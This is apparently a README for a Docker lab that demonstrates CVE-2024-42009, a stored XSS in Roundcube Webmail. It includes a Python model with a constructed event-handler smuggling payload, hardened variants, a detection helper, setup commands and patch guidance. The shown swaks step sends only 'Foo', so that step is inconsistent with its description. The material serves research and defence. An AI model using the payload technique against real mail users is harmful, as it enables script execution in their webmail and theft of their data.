## https://sploitus.com/exploit?id=AE873A7A-B3DF-5925-A2E3-2F8666114170
# CVE-2024-42009: Roundcube Stored XSS (Docker PoC)
## Overview
This repository contains a working Proof-of-Concept (PoC) for **CVE-2024-42009**, a stored Cross-Site Scripting (XSS) vulnerability in Roundcube Webmail, packaged as a Docker lab.
The root cause is not the sanitizer alone but what happens after it: Roundcube sanitizes the HTML of an incoming message and then re-processes certain attributes of the sanitized markup as raw text, without respecting attribute boundaries. A crafted HTML email can therefore get an event handler back into attribute position, and the script runs when the victim opens the message.
---
## Affected Versions
* Roundcube ≤ 1.5.7 (the 1.5 branch and everything before it)
* Roundcube 1.6.0 through 1.6.7
---
## Vulnerability Summary
Roundcube's HTML sanitizer strips event-handler attributes and other dangerous markup from incoming HTML mail. The message renderer then re-processes certain attributes of the sanitized output (e.g. `bgcolor`, and malformed attributes) with text-level rewrites instead of operating on parsed attributes. Text that the sanitizer correctly left alone because it sat inside a quoted attribute value can, after such a rewrite, land in attribute position. This leads to:
* Attribute boundary confusion (a rewrite consumes or shifts a quote)
* Injection of new attributes out of what used to be an attribute value
* Event handlers such as `onanimationstart`, which the sanitizer would never let through as attributes, appearing as live attributes in the final markup
`onanimationstart` fires as soon as the CSS animation it is attached to starts, so the injected JavaScript executes when the victim merely opens the email; no click or other interaction is required.
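The sanitize-then-rewrite pattern described above, as an added example that is not code from this repository or from Roundcube: a toy sanitizer that strips `on*` attributes, followed by a regex-based `bgcolor` rewrite that does not know where the quoted value containing the text `bgcolor=` ends, beside two hardened variants (rewrite on parsed attributes, or sanitize last) and a detection helper. The payload, the `spin` animation name and every function name are constructed for the illustration; the real Roundcube code and the PoC's mail body differ.

```python
"""Model of a sanitize-then-rewrite pipeline that frees a smuggled event handler.

Constructed illustration only: the sanitizer, the bgcolor rewrite and the payload
are simplified stand-ins, not Roundcube's sanitizer or message-rendering code.
"""
import html
import re

# One attribute token, roughly as a browser tokenizes it: a quoted value runs to the
# matching quote, an unquoted value runs to whitespace or '>'.
ATTR_RE = re.compile(r"""\s*([^\s=/>"']+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?""")
TAG_RE = re.compile(r"<([a-zA-Z][\w-]*)([^>]*)>")          # start tags only ('</' never matches)
# Text-level bgcolor rewrite. The optional trailing quote is the bug: it can eat the
# closing quote of whatever attribute the text "bgcolor=" happened to sit inside.
BGCOLOR_RE = re.compile(r"""bgcolor=["']?([^"'\s>]+)["']?""", re.I)
SMUGGLED_RE = re.compile(r"\bon\w+\s*=", re.I)

# Constructed payload (an assumption, not the PoC's mail body): the handler sits inside
# a harmless attribute value, so a correct sanitizer sees nothing to strip.
PAYLOAD = ('<body title="bgcolor=red" '
           'name="x style=animation-name:spin onanimationstart=alert(origin)">Foo</body>')


def parse_attrs(attr_str):
    """Tokenize a start tag's attribute string into (name, value) pairs."""
    attrs, pos = [], 0
    while pos < len(attr_str):
        m = ATTR_RE.match(attr_str, pos)
        if m is None:
            pos += 1                      # stray character, e.g. an unmatched quote
            continue
        value = next((g for g in m.groups()[1:] if g is not None), "")
        attrs.append((m.group(1).lower(), value))
        pos = m.end()
    return attrs


def serialize_attrs(attrs):
    """Re-emit attributes with every value quoted and escaped."""
    return "".join(' %s="%s"' % (k, html.escape(v, quote=True)) for k, v in attrs)


def sanitize(markup):
    """Stage 1: drop every on* attribute from every start tag (the sanitizer step)."""
    def clean(m):
        kept = [(k, v) for k, v in parse_attrs(m.group(2)) if not k.startswith("on")]
        return "<" + m.group(1) + serialize_attrs(kept) + ">"
    return TAG_RE.sub(clean, markup)


def rewrite_body_unsafe(markup):
    """Stage 2, vulnerable: turn <body> into <div> by a regex over the raw attribute text."""
    def rewrite(m):
        return "<div" + BGCOLOR_RE.sub(r"style=background-color:\1", m.group(1)) + ">"
    return re.sub(r"<body([^>]*)>", rewrite, markup, flags=re.I).replace("</body>", "</div>")


def rewrite_body_safe(markup):
    """Stage 2, hardened: same transformation on parsed attributes, re-serialized quoted."""
    def rewrite(m):
        attrs = [("style", "background-color:" + v) if k == "bgcolor" else (k, v)
                 for k, v in parse_attrs(m.group(1))]
        return "<div" + serialize_attrs(attrs) + ">"
    return re.sub(r"<body([^>]*)>", rewrite, markup, flags=re.I).replace("</body>", "</div>")


def event_handlers(markup):
    """Names of the on* attributes a browser would see in the final markup."""
    return [k for m in TAG_RE.finditer(markup)
            for k, _ in parse_attrs(m.group(2)) if k.startswith("on")]


def smuggled_handlers(markup):
    """Detection heuristic: attribute values carrying 'on...=' text, i.e. handlers parked
    inside a value, waiting for a later text-level rewrite to free them."""
    return [(k, v) for m in TAG_RE.finditer(markup)
            for k, v in parse_attrs(m.group(2)) if SMUGGLED_RE.search(v)]


def render_unsafe(markup):
    return rewrite_body_unsafe(sanitize(markup))       # sanitize, then rewrite as text: the bug


def render_safe(markup):
    return rewrite_body_safe(sanitize(markup))         # rewrite structurally, never by regex


def render_sanitize_last(markup):
    return sanitize(rewrite_body_unsafe(markup))       # or make sanitization the last step


if __name__ == "__main__":
    for fn in (render_unsafe, render_safe, render_sanitize_last):
        out = fn(PAYLOAD)
        print("%-20s handlers=%-20s %s" % (fn.__name__, event_handlers(out), out))
    print("flagged on input:", smuggled_handlers(PAYLOAD))
```

Run it to see the three pipelines side by side: the vulnerable one emits `onanimationstart` as a live attribute on the `<div>` because the rewrite swallowed the closing quote of `title`, which flips the quoting of everything after it. `smuggled_handlers()` is the mail-gateway side of the same idea, flagging attribute values that contain `on...=` text before any server-side rewrite can free them; expect occasional false positives on ordinary prose inside `title` or `alt`.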
---
## Environment Setup (Docker)
### 1. Clone the repository
```bash
git clone https://github.com/yourusername/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
```
---
### 2. Start the vulnerable lab
```bash
docker compose up -d
```
Wait ~10-15 seconds for the mail server to initialize.
---
### 3. Create test users
```bash
docker exec mailserver setup email add attacker@lab.local 'attacker123'
docker exec mailserver setup email add victim@lab.local 'victim123'
```
---
### 4. Access Roundcube
```
http://localhost:8080
```
**Credentials:**
* victim@lab.local / victim123
* attacker@lab.local / attacker123
---
## Exploitation
Send the malicious email with **swaks** (the command-line SMTP test tool) straight to the lab's SMTP listener; no mail client has to be configured:
```bash
# 2525 is the lab's SMTP port; the Content-Type header makes Roundcube render the body as HTML
swaks --to victim@lab.local \
      --from attacker@lab.local \
      --server localhost:2525 \
      --header "Content-Type: text/html; charset=utf-8" \
      --header "Subject: CVE-2024-42009 PoC" \
      --body 'Foo'
```
---
## PoC
1. Log in to Roundcube as the victim account
2. Open the message in the inbox
3. The JavaScript executes (an alert pops) as soon as the message is rendered; no click is needed
---
## Mitigation
Upgrade to a patched release:
* Roundcube ≥ 1.6.8 (1.6 branch)
* Roundcube ≥ 1.5.8 (1.5 branch)
---
## References
* NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-42009
* Roundcube Security Advisory
---
## Disclaimer
This project is for educational and authorized security research purposes only.
Do not use against systems without proper permission.
---